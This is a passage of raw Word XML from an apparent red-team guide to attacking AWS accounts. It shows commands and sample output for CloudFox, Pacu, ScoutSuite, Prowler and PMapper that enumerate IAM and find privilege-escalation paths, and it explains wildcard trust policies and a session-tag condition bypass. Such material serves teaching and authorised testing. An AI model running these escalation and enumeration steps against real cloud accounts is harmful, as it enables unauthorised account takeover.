        <w:t>— 14 ALBs, 9 API GW stages, 3 Lambda URLs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA34174"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role-trusts.md         — 41 trust relationships (5 cross-account, 2 with *)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E12EF89"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buckets.md             — 63 S3 buckets, 4 with BlockPublicAccess=false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277C1FEE"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workloads.md           — 51 EC2, 14 ECS tasks, 22 Lambda, 3 EKS clusters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE1BA09" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:spacing w:before="216" w:after="216"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="d"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>[cloudfox] Top attack paths surfaced:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AADD88"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1. ci-deploy-bot → iam:PassRole + lambda:CreateFunction → admin role</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4301AAAF"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2. EC2 'jump-dev' IMDSv1 enabled → instance role 'ec2-admin-legacy'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FDD437"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3. 'billing-auditor' role trusts * via StringLike condition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C3173F"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 xml:space="preserve">  4. S3 bucket 'acme-terraform-state' has AllowedPrincipal '*' on GetObject</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645FC0D9"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cloudfox aws — module ma</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>p</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inventor</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all resource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iam-principal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users+roles+group</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iam-simulato</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permission simulatio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role-trust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AssumeRole grap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>h</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bucket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policies + ACL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secret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userdata, env, SS</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endpoint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ALB, API GW, Lambda UR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>L</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workload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ECS EKS Lambd</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route5</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ek</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ram-share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all-checks — runs every module and produces a prioritized attack-path lis</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CloudFox module map. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>all-checks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the usual entry point; individual modules are useful when time or OPSEC budget is tight. Every module is read-only — no CloudTrail </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Put</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Create</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Delete</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> events ever come from CloudFox</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48763380" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>5.3  Pacu for active enumeration and exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A29A3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Pacu is the open-source AWS exploitation framework. It provides an interactive TUI, imports credentials from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>~/.aws/credentials</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> or a plain key pair, and runs modules that both enumerate and exploit. The essentials:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E029B86"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pacu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75154D6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Pacu (demo:None) &gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="c"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>set_keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D474DA5"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Key alias: target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437A9C11"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Access key ID: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>AKIAEXAMPLETARGET</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C20BF2"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Secret access key: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>wJalrEXAMPLE/...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C511F9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Session token (optional):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3624DE"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Keys saved.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B315542"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(demo:target) &gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="c"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>run iam__enum_users_roles_policies_groups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA07B25"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Found 28 users, 59 roles, 117 managed policies, 9 groups across 1 account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA14727"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(demo:target) &gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="c"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>run iam__enum_permissions --all-users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F33A82A"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Enumerating...  (takes 2–6 minutes per principal)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC73CFB"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Saved results to: ~/.local/share/pacu/demo/downloads/confirmed_permissions/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057B4E57"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(demo:target) &gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="c"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>run iam__privesc_scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66791B52"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Scanning 28 users and 59 roles against 32 known privesc primitives...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1A1013"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 ci-deploy-bot  is vulnerable to: iam:PassRole + lambda:CreateFunction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E78956"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 release-mgr    is vulnerable to: iam:CreatePolicyVersion (SetAsDefault=true)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8C7951"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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="r"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>[!] build-automate is vulnerable to: iam:UpdateAssumeRolePolicy (own target role)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E16E06F"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 3 of 28 principals have at least one privesc path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EACCB28"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(demo:target) &gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="c"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>run ec2__enum --regions us-east-1,us-west-2,eu-west-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FA864A"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Enumerated 51 EC2 instances, 14 security groups, 9 VPCs, 23 volumes...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FE86A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(demo:target) &gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="c"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>run s3__bucket_finder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D813A65"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63 buckets, 4 public, 11 accessible to current principal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A9FA39" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>5.4  ScoutSuite, Prowler, and the compliance-adjacent tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F14C2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ScoutSuite and Prowler are not offensive tools per se — they are audit scanners that emit HTML reports keyed to CIS benchmarks, PCI, and similar. For a red-teamer, they are a cheat code: they find configuration issues that a defender knows to look for and thus frames the findings in the blue team's language. If Prowler tells you S3 bucket X is publicly writable, your finding lands with the customer already mapped to a remediation step.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44024549"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scout aws --profile target --no-browser --report-dir scout-out/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2628DD4F" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:spacing w:before="216" w:after="216"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="d"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>[scoutsuite] Running 45 rulesets across 6 services...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BEF233"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[scoutsuite] Report: scout-out/scoutsuite-report/scoutsuite-results/aws-target.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205E417B" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:spacing w:before="216" w:after="216"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="d"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>[scoutsuite] Findings: 12 danger, 31 warning, 14 info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B02D2F0"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prowler aws --profile target --compliance cis_2.0_aws --output-formats json-ocsf csv html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1663376D" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:spacing w:before="216" w:after="216"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="d"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>[prowler] 244 checks across 38 services in 4m 21s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77521C32"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[prowler] FAIL: iam_root_mfa_enabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2410B4EF"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[prowler] FAIL: cloudtrail_multi_region_enabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF9F796"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[prowler] FAIL: s3_bucket_acl_prohibit_public_read</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239C0944"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[prowler] Reports in output/target/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341C2C07" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>5.5  PMapper for privilege-escalation graphs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D1D67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PMapper (Principal Mapper) builds a directed graph where nodes are IAM principals and edges are "X can become Y." An edge might represent </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>AssumeRole</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> trust, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>iam:PassRole</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> + a compute service, or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>iam:CreateAccessKey</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> on another user. The resulting graph answers the single most important question in an engagement: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>from my current identity, which other identities can I reach?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D8FD7"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pmapper --profile target graph create</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7123E133" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:spacing w:before="216" w:after="216"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="d"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Organization graph: gathering data for 444455556666...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08836747"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users: 28   roles: 59   groups: 9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341DCB1C"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edges: 184 (AssumeRole: 112 / PassRole: 47 / CreateAccessKey: 18 / Other: 7)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7605D37A"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graph written to ~/.principalmapper/444455556666/graph.json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588ED526"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pmapper --profile target query 'preset privesc'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A93E6F2"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ci-deploy-bot can escalate to admin via:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170FD172"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iam:PassRole -&gt; lambda:CreateFunction -&gt; lambda:UpdateFunctionCode -&gt; Invoke</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E2BBE2"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release-mgr can escalate to admin via:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194EB328"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iam:CreatePolicyVersion -&gt; SetAsDefault on AdministratorAccess-like policy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3BC824"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pmapper --profile target visualize --only-privesc --filetype svg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F79F946"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wrote ~/.principalmapper/444455556666/graph-privesc.svg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455CD75C" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>5.6  Reading role trust policies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BEB19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role's trust policy answers the question: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>who can assume this role?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> It is independent of the role's inline and attached policies (which answer: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>what can this role do?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>). An over-permissive trust policy is how cross-account takeover begins.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB017D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dangerous trust policy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31907EF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0F6358A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"Version": "2012-10-17",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714C6B0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"Statement": [{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB321D9"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"Effect": "Allow",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422632C3"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"Principal": { "AWS": "*" },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E762DC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"Action": "sts:AssumeRole",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C6AA9F"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"Condition": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8C5740"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"StringLike": { "aws:PrincipalArn": "arn:aws:iam::*:role/build-*" }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FC02A6"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56FE705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7A27E7B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67F0F68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This trust allows any role in any account matching </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>build-*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> to assume it. If any AWS account — including the attacker's — has a role named </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>build-ci</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>build-anything</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>, it assumes into the target. Condition keys like this recur in real-world misconfigurations more often than operators expect.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222D6E22" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>5.7  Session-tag reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E6DBD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IAM session tags (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>sts:AssumeRole</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>--tags</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">) can be used by the caller to pass attribute data into the target role's session. Some policies evaluate </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>aws:PrincipalTag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> conditions; if the trust policy allows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>sts:TagSession</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, an attacker can pass a tag they control to bypass conditions written against their attributes. CloudFox's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>iam-simulator</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
